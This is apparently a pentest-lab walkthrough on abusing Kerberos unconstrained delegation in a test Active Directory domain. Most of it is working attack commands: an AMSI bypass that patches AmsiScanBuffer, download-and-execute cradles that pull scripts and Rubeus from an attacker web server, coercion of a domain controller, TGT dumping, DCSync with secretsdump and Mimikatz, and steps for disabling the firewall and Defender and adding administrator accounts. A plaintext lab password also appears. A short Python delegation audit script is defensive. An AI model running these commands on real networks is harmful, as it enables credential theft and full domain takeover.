
# Unconstrain

* The simplest way to exploit unconstrained delegation is from Windows with Rubeus.
* We open an RDP connection to Bronx.
* We got Fernando.Alonzo's password from the DonPAPI dump.
* <https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#unconstrained-delegation>

```
xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80%  /cert-ignore
```
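Before running the attack chain below, it is worth knowing which accounts in a domain actually carry the flag being abused. The following is an added Python example (not part of the original page, Rubeus or Impacket): it classifies LDAP-style records by the documented userAccountControl bits (TRUSTED_FOR_DELEGATION 0x80000, SERVER_TRUST_ACCOUNT 0x2000, NOT_DELEGATED 0x100000) and reports the two conditions this attack relies on: a host trusted for unconstrained delegation, and a privileged account whose TGT is still allowed to be delegated. The sample records and account names are constructed placeholders, not an export from the lab domain.

```python
# Added audit example: classify accounts by the userAccountControl bits behind
# "unconstrained delegation".  SAMPLE_RECORDS is constructed data shaped like
# an LDAP export; the account names are placeholders, not the lab's hosts.

SERVER_TRUST_ACCOUNT = 0x2000      # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000   # "Trust this computer for delegation to any service"
NOT_DELEGATED = 0x100000           # "Account is sensitive and cannot be delegated"

def classify_delegation(uac, allowed_to=()):
    """Label one account from its userAccountControl value and its
    msDS-AllowedToDelegateTo list (constrained delegation targets)."""
    if uac & TRUSTED_FOR_DELEGATION:
        # DCs carry the flag by default; on any other host it means every
        # TGT forwarded to that host (e.g. after coercion) can be replayed.
        return "dc" if uac & SERVER_TRUST_ACCOUNT else "unconstrained"
    if allowed_to:
        return "constrained"
    return "none"

def audit(records, privileged):
    """Return (account, severity, message) triples.  `privileged` lists
    accounts whose TGT must never be delegable (Tier 0 admins, services)."""
    findings = []
    for r in records:
        name, uac = r["sAMAccountName"], r["userAccountControl"]
        kind = classify_delegation(uac, r.get("msDS-AllowedToDelegateTo", ()))
        if kind == "unconstrained":
            findings.append((name, "high", "non-DC host trusted for unconstrained "
                             "delegation; move to constrained/RBCD or remove the flag"))
        elif kind == "dc":
            findings.append((name, "info", "DC is unconstrained by design; a compromised "
                             "DC captures every TGT coerced to it, so treat all DCs as Tier 0"))
        if name in privileged and not (uac & NOT_DELEGATED):
            findings.append((name, "high", "privileged account is delegable; set "
                             "NOT_DELEGATED and add it to Protected Users"))
    return findings

SAMPLE_RECORDS = [  # constructed; UAC values are the usual defaults for each role
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000},
    {"sAMAccountName": "SQL01$", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["cifs/fileserver.example.local"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x100200},
]
PRIVILEGED = {"Administrator", "svc_backup"}

if __name__ == "__main__":
    for name, severity, msg in audit(SAMPLE_RECORDS, PRIVILEGED):
        print(f"[{severity}] {name}: {msg}")
```

In a real domain the records would come from an LDAP query for `userAccountControl` and `msDS-AllowedToDelegateTo`; the DC finding is informational because, as on this page, a child-domain DC with the default flag is enough to capture the parent DC's TGT.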

From there we will bypass AMSI and launch Rubeus in memory.

* Prepare our server containing Rubeus.exe and our AMSI bypass.

```
python3 -m http.server 8080
```

* In the RDP session, bypass AMSI:

`amsi_rmouse.txt` contains the following commands:

```
# Patching amsi.dll AmsiScanBuffer by rasta-mouse
$Win32 = @"

using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
```

Download Rubeus.exe to Parrot OS:

```
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
```

Download and execute `amsi_rmouse.txt` to bypass AMSI:

```
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX
```

* Now launch Rubeus in memory via execute-assembly.
* First, list the available tickets:

```
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8000/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");
```

<figure><img src="/files/DXaJ6zLA2WpumI2oxhMg" alt=""><figcaption></figcaption></figure>

* Now coerce the DC NYC into authenticating to the DC Bronx.

```
Coercer fuzz -u pablo.sandoval -d north.newyork.local -p baseballpanda -t nyc.newyork.local
```

* Run the triage again:

```
[Rubeus.Program]::MainString("triage")
```

* The TGT of NYC is now present.

<figure><img src="/files/Ig8pQseH08FFYHeG8lUb" alt=""><figcaption></figcaption></figure>

* To extract it, relaunch Coercer and about one second later run the following dump command (I don't know why, but Rubeus monitor mode refuses to run via execute-assembly):

```
[Rubeus.Program]::MainString("dump /user:nyc$ /service:krbtgt /nowrap");
```

<figure><img src="/files/JlUHWYQTknDWXrVJsUFc" alt=""><figcaption></figcaption></figure>

* We now have the TGT of the domain controller.
* Let's continue on Linux to pass the ticket and run a DCSync with secretsdump:
  * copy the ticket without spaces or line breaks (in vim: `:%s/\s*\n\s*//g`)
  * convert the ticket to ccache
  * use the Kerberos ticket and run secretsdump

```
cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC
```

<figure><img src="/files/9QJaLuPRXGgu227NBAhK" alt=""><figcaption></figcaption></figure>

Another way to exploit this is to pass the ticket (PTT) with Rubeus and run a DCSync with Mimikatz, but that implies running Mimikatz on Bronx and bypassing the Defender AV.

Useful references for this variant:

* <https://github.com/SolomonSklash/RubeusToCcache>
* <https://github.com/jtmpu/PrecompiledBinaries/blob/master/SpoolSample.exe>
* <https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919>
* <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation>

```
# Fetch PowerView onto the target
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')

# Wait for the NYC$ TGT with Rubeus monitor, then coerce NYC with SpoolSample
rubeus.exe monitor /targetuser:nyc$ /interval:10
SpoolSample.exe nyc bronx

# Write the captured base64 ticket to disk
[IO.File]::WriteAllBytes("C:\Users\fernando.Alonzo\Desktop\DC.kirbi", [Convert]::FromBase64String("base64"))

# Mimikatz: pass the ticket, then DCSync
kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi
lsadump::dcsync /domain:newyork.local /user:nyc$
lsadump::lsa /domain:newyork.local /user:nyc$
lsadump::dcsync /user:krbtgt
```

Miscellaneous notes (CMD):

```
# Disable firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"

# Disable Defender real-time monitoring
Set-MpPreference -DisableRealtimeMonitoring $true

# Change a user password via PowerShell (as administrator)
Set-ADAccountPassword -Identity $user -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "$newPass" -Force)

# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Create a new local user
net user username password /ADD

# Add a new user account to the domain
net user username password /ADD /DOMAIN

# Add a user to the Administrators group
net localgroup Administrators Tom /add
```

